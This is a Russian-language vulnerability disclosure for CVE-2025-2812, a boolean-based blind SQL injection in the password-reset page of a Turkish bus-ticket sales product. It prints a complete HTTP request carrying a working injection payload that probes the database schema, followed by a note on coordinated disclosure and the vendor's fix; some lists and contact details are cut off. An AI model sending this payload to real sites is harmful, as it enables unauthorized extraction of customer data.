
CVE-2025-2812 SQL Injection
📌 CVE-ID: CVE-2025-2812
📢 Уведомление USOM: tr-25-0099
🛡️ Тип уязвимости: CWE-89 — SQL-инъекция (Boolean-based Blind)
🏢 Затронутый продукт: Bilet Satış Otomasyonu – Mydata Bilişim Ltd. Şti
🌐 Пример целевого URL:https://otobusfirmasi.com.tr/otobus-bileti/SifremiUnuttum.php
В продукте "Bilet Satış Otomasyonu" на странице сброса пароля (SifremiUnuttum.php) в параметре "Adınızın ilk harfi" (ilkHarf) обнаружена уязвимость Boolean-based Blind SQL Injection. Эта уязвимость позволяет извлекать данные из системы без имени пользователя или пароля.
Данная уязвимость затрагивает системы следующих автобусных компаний:
GET /otobus-bileti/SifremiUnuttumBilgi.php?TelefonNo=12313131231312313&ilkHarf=a')%20OR%20NOT%20LENGTH(LENGTH((SELECT%20SCHEMA_NAME%20FROM(INFORMATION_SCHEMA.SCHEMATA)LIMIT%200,1)))=1--%20wXyW HTTP/1.1
Host: otobusfirmasi.com.tr
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: https://otobusfirmasi.com.tr/otobus-bileti/SifremiUnuttum.php
Cookie: PHPSESSID=***************
TelefonNo=12313131231312313&ilkHarf=a')%20OR%20NOT%20LENGTH(LENGTH((SELECT%20SCHEMA_NAME%20FROM(INFORMATION_SCHEMA.SCHEMATA)LIMIT%200,1)))=1--%20wXyW
ilkHarfПосле обнаружения нами уязвимости в продукте "Bilet Satış Otomasyonu", разработанном "Mydata Bilişim Ltd. Şti", данная уязвимость, объявленная под кодом CVE-2025-2812, была опубликована в координации с производителем и USOM. Мы гордимся тем, что внесли вклад в сообщество кибербезопасности в этом процессе.
После уведомления об уязвимости Mydata Bilişim Ltd. Şti быстро выполнила все необходимые процедуры, закрыла соответствующую уязвимость и интегрировала дополнительные меры безопасности в свои системы. Благодарим их за проявленную прозрачность, сотрудничество и чувство ответственности.
Мы гордимся тем, что внесли вклад в сообщество кибербезопасности в этом процессе.
По любым вопросам, отзывам или предложениям о сотрудничестве вы можете связаться со мной: